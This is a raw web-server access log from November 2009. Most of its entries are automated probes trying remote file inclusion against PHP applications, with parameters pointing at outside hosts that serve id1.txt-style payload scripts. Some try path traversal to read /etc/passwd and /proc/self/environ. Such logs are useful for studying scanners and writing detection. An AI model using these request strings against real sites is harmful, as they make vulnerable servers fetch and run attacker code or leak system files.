64.34.111.74 - - [14/Nov/2009:00:22:19 -0600] "GET /logs/access_log.1244937600//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:24 -0600] "GET /logs/access_log.1247270400//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:34 -0600] "GET /logs/access_log.1245196800//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:22:38 -0600] "GET /logs/access_log.1245196800//include/mail.inc.php?skin_board_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:22:59 -0600] "GET //bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:22:59 -0600] "GET /logs/access_log.1253145600//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:23:08 -0600] "GET //bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:23:08 -0600] "GET /logs//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:23:08 -0600] "GET /logs/access_log.1250899200//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:23:51 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:23:51 -0600] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:23:51 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:24:15 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:24:15 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:24:15 -0600] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:24:36 -0600] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:24:53 -0600] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:25:27 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:25:27 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:25:27 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:25:38 -0600] "GET /logs/access_log.1243555200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
200.234.200.152 - - [14/Nov/2009:00:25:45 -0600] "GET /logs/admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
200.234.200.152 - - [14/Nov/2009:00:25:45 -0600] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
89.171.190.107 - - [14/Nov/2009:00:25:51 -0600] "GET /logs/access_log.1250985600//bbs/skin/happycast_blue/login.php?dir=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:26:02 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:26:02 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:26:02 -0600] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:26:12 -0600] "GET /logs/access_log.1243555200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://babem.net/zfxid1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:27:26 -0600] "GET /logs//error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:27:26 -0600] "GET /logs/access_log.1250899200//error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.171.190.107 - - [14/Nov/2009:00:27:29 -0600] "GET //error.php?error=http://kb27.co.kr/bbs///data/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.55.106.179 - - [14/Nov/2009:00:28:55 -0600] "GET /logs/access_log.1226620800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
200.234.200.152 - - [14/Nov/2009:00:29:11 -0600] "GET /logs/access_log.1238457600/admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.805"
200.234.200.152 - - [14/Nov/2009:00:29:11 -0600] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
200.234.200.152 - - [14/Nov/2009:00:29:12 -0600] "GET /logs/admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
200.234.200.152 - - [14/Nov/2009:00:29:13 -0600] "GET /logs/access_log.1238457600/admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 352 "-""libwww-perl/5.805"
200.234.200.152 - - [14/Nov/2009:00:29:13 -0600] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 325 "-""libwww-perl/5.805"
200.234.200.152 - - [14/Nov/2009:00:29:14 -0600] "GET /logs/admin/includes/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 330 "-""libwww-perl/5.805"
61.100.181.217 - - [14/Nov/2009:00:30:01 -0600] "GET /?base_folder=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:00:30:01 -0600] "GET /logs/access_log.1239062400/?base_folder=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:00:30:01 -0600] "GET /logs/access_log.1247529600/?base_folder=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:00:30:03 -0600] "GET /logs/?base_folder=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 212720 "-""Mozilla/5.0"
65.55.106.183 - - [14/Nov/2009:00:31:54 -0600] "GET /logs/access_log.1141257600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.110.50.127 - - [14/Nov/2009:00:33:29 -0600] "GET //bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:29 -0600] "GET /logs/access_log.1253059200//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:30 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:33 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:33 -0600] "GET //bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:33 -0600] "GET /logs/access_log.1253059200//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:40 -0600] "GET /logs/access_log.1253059200//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:40 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:40 -0600] "GET //bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:45 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:45 -0600] "GET //bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:45 -0600] "GET /logs/access_log.1253059200//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:51 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:51 -0600] "GET //bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:51 -0600] "GET /logs/access_log.1253059200//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:52 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:52 -0600] "GET //bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:33:52 -0600] "GET /logs/access_log.1253059200//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET //bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET /logs/access_log.1252713600//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET /logs/access_log.1251936000//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET //bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET /logs/access_log.1252713600//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:02 -0600] "GET /logs/access_log.1251936000//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:13 -0600] "GET /logs/access_log.1252713600//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:14 -0600] "GET //bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:15 -0600] "GET /logs/access_log.1251936000//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:15 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:34:16 -0600] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:34:16 -0600] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:34:16 -0600] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:34:18 -0600] "GET //kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:34:19 -0600] "GET /logs/access_log.1228608000//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:34:19 -0600] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:21 -0600] "GET /logs/access_log.1252713600//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:21 -0600] "GET //bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:21 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:21 -0600] "GET /logs/access_log.1251936000//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:22 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:23 -0600] "GET //bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:23 -0600] "GET /logs/access_log.1252713600//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:24 -0600] "GET /logs/access_log.1251936000//bbs/skin/ruvin_fine_gall2/eror.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:37 -0600] "GET /logs//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 324 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:37 -0600] "GET //bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:37 -0600] "GET /logs/access_log.1252713600//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
78.110.50.127 - - [14/Nov/2009:00:34:37 -0600] "GET /logs/access_log.1251936000//bbs/skin/ruvin_fine_gall2/lohin.php?dir=http://dk.fileave.com/heheh.txt???? HTTP/1.1" 404 346 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:35:01 -0600] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:35:01 -0600] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:35:01 -0600] "GET /logs/access_log.1243468800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:35:14 -0600] "GET /logs/access_log.1247356800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:35:25 -0600] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:35:26 -0600] "GET /logs/access_log.1230508800//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.55.110.204 - - [14/Nov/2009:00:36:00 -0600] "GET /logs/access_log.1111536000 HTTP/1.1" 200 290 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4325; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)"
64.34.111.74 - - [14/Nov/2009:00:36:28 -0600] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:36:28 -0600] "GET /logs/access_log.1243468800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:36:28 -0600] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:36:32 -0600] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:00:36:37 -0600] "GET /logs/access_log.1228608000%20%20//kboard.php?board=sightseeing&cid=1&PageNum=5//kboard/kboard.php?board=free&act=http://koryochemical.co.kr/board/download/data//fx29id.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:00:36:40 -0600] "GET /logs/access_log.1247356800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://neox.com.ua/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.110.203 - - [14/Nov/2009:00:37:25 -0600] "GET /logs/access_log.1118016000 HTTP/1.1" 200 660 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.40607; .NET CLR 3.0.04506.648)"
72.232.167.73 - - [14/Nov/2009:00:37:49 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 341 "-""-"
72.232.167.73 - - [14/Nov/2009:00:37:49 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 336 "-""-"
72.232.167.73 - - [14/Nov/2009:00:37:49 -0600] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 341 "-""-"
72.232.167.73 - - [14/Nov/2009:00:37:49 -0600] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 336 "-""-"
74.213.177.58 - - [14/Nov/2009:00:39:18 -0600] "GET /logs/admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 330 "-""libwww-perl/5.805"
74.213.177.58 - - [14/Nov/2009:00:39:19 -0600] "GET /admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.spotmerkezi.com/cache/idv6.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
65.55.106.183 - - [14/Nov/2009:00:40:25 -0600] "GET /logs/access_log.1200182400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
94.198.53.208 - - [14/Nov/2009:00:41:57 -0600] "GET /logs/access_log.1250035200//skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
94.198.53.208 - - [14/Nov/2009:00:41:57 -0600] "GET /logs//skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
94.198.53.208 - - [14/Nov/2009:00:41:57 -0600] "GET //skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
94.198.53.208 - - [14/Nov/2009:00:41:58 -0600] "GET /logs/access_log.1252108800//skin/rosun_comm2_gallery/setup.php?dir=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
89.18.174.43 - - [14/Nov/2009:00:42:39 -0600] "GET /logs/access_log.1246752000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
89.18.174.43 - - [14/Nov/2009:00:42:39 -0600] "GET /logs/access_log.1251676800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
89.18.174.43 - - [14/Nov/2009:00:42:40 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.18.174.43 - - [14/Nov/2009:00:42:40 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:42:50 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:42:50 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:42:50 -0600] "GET /logs/access_log.1246752000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
174.133.68.82 - - [14/Nov/2009:00:42:50 -0600] "GET /logs/access_log.1251676800//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://sorket.so.funpic.de/sop/fx29id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
219.254.35.13 - - [14/Nov/2009:00:42:55 -0600] "GET //include/admin.lib.inc.php?site_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 309 "-""Mozilla/5.0"
219.254.35.13 - - [14/Nov/2009:00:42:55 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 314 "-""Mozilla/5.0"
219.254.35.13 - - [14/Nov/2009:00:42:55 -0600] "GET /logs/access_log.1233705600//include/admin.lib.inc.php?site_path=http://nma.fileave.com/id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
